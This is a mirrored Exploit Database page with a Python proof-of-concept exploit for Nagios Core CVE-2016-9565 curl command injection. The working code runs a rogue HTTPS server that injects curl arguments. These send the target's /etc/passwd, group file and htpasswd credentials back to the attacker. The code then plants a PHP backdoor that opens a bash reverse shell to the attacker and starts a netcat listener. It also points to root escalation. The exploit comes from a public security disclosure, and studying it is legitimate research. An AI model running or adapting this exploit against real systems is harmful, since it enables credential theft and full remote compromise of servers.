Nagios < 4.2.2 - Arbitrary Code Execution

• Exploit Database
• 120 阅读

• 作者： Dawid Golunski
  日期： 2016-12-15
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/40920/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175

  #!/usr/bin/env python   # Source: https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html   intro = """\033[94m Nagios Core < 4.2.0 Curl Command Injection / Code Execution PoC Exploit CVE-2016-9565 nagios_cmd_injection.py ver. 1.0   Discovered & Coded by:   Dawid Golunski https://legalhackers.com \033[0m """ usage = """ This PoC exploit can allow well-positioned attackers to extract and write arbitrary files on the Nagios server which can lead to arbitrary code execution on Nagios deployments that follow the official Nagios installation guidelines.   For details, see the full advisory at: https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html   PoC Video: https://legalhackers.com/videos/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html   Follow https://twitter.com/dawid_golunski for updates on this advisory.   Remember you can turn the nagios shell into root shell via CVE-2016-9565: https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html   Usage:   ./nagios_cmd_injection.py reverse_shell_ip [reverse_shell_port]   Disclaimer: For testing purposes only. Do no harm.   """   import os import sys import time import re import tornado.httpserver import tornado.web import tornado.ioloop   exploited= 0 docroot_rw = 0   class MainHandler(tornado.web.RequestHandler):   def get(self): global exploited if (exploited == 1): self.finish() else: ua= self.request.headers[&apos;User-Agent&apos;] if "Magpie" in ua: print "[+] Received GET request from Nagios server (%s) ! Sending redirect to inject our curl payload:\n" % self.request.remote_ip print&apos;-Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii &apos; + backdoor_path + &apos;\n&apos; self.redirect(&apos;https://&apos; + self.request.host + &apos;/nagioshack -Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii &apos; + backdoor_path, permanent=False) exploited = 1   def post(self): global docroot_rw print "[+] Success, curl payload injected! Received data back from the Nagios server %s\n" % self.request.remote_ip   # Extract /etc/passwd from the target passwd = self.request.files[&apos;passwd&apos;][0][&apos;body&apos;] print "[*] Contents of /etc/passwd file from the target:\n\n%s" % passwd   # Extract /usr/local/nagios/etc/htpasswd.users htauth = self.request.files[&apos;htauth&apos;][0][&apos;body&apos;] print "[*] Contents of /usr/local/nagios/etc/htpasswd.users file:\n\n%s" % htauth   # Extract nagios group from /etc/group group = self.request.files[&apos;group&apos;][0][&apos;body&apos;] for line in group.splitlines(): if "nagios:" in line: nagios_group = line print "[*] Retrieved nagios group line from /etc/group file on the target: %s\n" % nagios_group if "www-data" in nagios_group: print "[+] Happy days, &apos;www-data&apos; user belongs to &apos;nagios&apos; group! (meaning writable webroot)\n" docroot_rw = 1   # Put backdoor PHP payload within the &apos;Server&apos; response header so that it gets properly saved via the curl &apos;trace-ascii&apos; # option. The output trace should containan unwrapped line similar to: # # == Info: Server <?php system("/bin/bash -c &apos;nohup bash -i >/dev/tcp/192.168.57.3/8080 0<&1 2>&1 &&apos;"); ?> is not blacklisted # # which will do the trick as it won&apos;t mess up the payload :) self.add_header(&apos;Server&apos;, backdoor)   # Return XML/feed with JavaScript payload that will run the backdoor code from nagios-backdoor.php via <img src=> tag :) print "[*] Feed XML with JS payload returned to the client in the response. This should load nagios-backdoor.php in no time :) \n" self.write(xmldata)   self.finish() tornado.ioloop.IOLoop.instance().stop()     if __name__ == "__main__": global backdoor_path global backdoor   print intro   # Set attacker&apos;s external IP & port to be used by the reverse shell if len(sys.argv) < 2 : print usage sys.exit(2) attacker_ip = sys.argv[1] if len(sys.argv) == 3 : attacker_port = sys.argv[1] else: attacker_port = 8080   # PHP backdoor to be saved on the target Nagios server backdoor_path = &apos;/usr/local/nagios/share/nagios-backdoor.php&apos; backdoor = """<?php system("/bin/bash -c &apos;nohup bash -i >/dev/tcp/%s/%s 0<&1 2>&1 &&apos;"); die("stop processing"); ?>""" % (attacker_ip, attacker_port)   # Feed XML containing JavaScript payload that will load the nagios-backdoor.php script global xmldata xmldata = """<?xml version="1.0"?> <rss version="2.0"> <channel> <title>Nagios feed with injected JS payload</title> <item> <title>Item 1</title> <description>   <strong>Feed injected. Here we go </strong> - loading /nagios/nagios-backdoor.php now via img tag... check your netcat listener for nagios shell ;)   <img src="https://www.exploit-db.com/nagios/nagios-backdoor.php" onerror="alert(&apos;Reverse Shell /nagios/nagios-backdoor.php executed!&apos;)">   </description>   </item>   </channel> </rss> """     # Generate SSL cert print "[+] Generating SSL certificate for our python HTTPS web server \n" os.system("echo -e &apos;\n\n\n\n\n\n\n\n\n&apos; | openssl req-nodes -new -x509-keyout server.key -out server.cert 2>/dev/null")   print "[+] Starting the web server on ports 80 & 443 \n" application = tornado.web.Application([ (r&apos;/.*&apos;, MainHandler) ]) application.listen(80) http_server = tornado.httpserver.HTTPServer( application, ssl_options = { "certfile": os.path.join("./", "server.cert"), "keyfile": os.path.join("./", "server.key"), } ) http_server.listen(443)   print "[+] Web server ready for connection from Nagios (http://target-svr/nagios/rss-corefeed.php). Time for your dnsspoof magic... ;)\n" tornado.ioloop.IOLoop.current().start()   if (docroot_rw == 1): print "[+] PHP backdoor should have been saved in %s on the target by now!\n" % backdoor_path print "[*] Spawning netcat and waiting for the nagios shell (remember you can escalate to root via CVE-2016-9566 :)\n" os.system("nc -v -l -p 8080") print "\n[+] Shell closed\n"   print "[+] That&apos;s all. Exiting\n"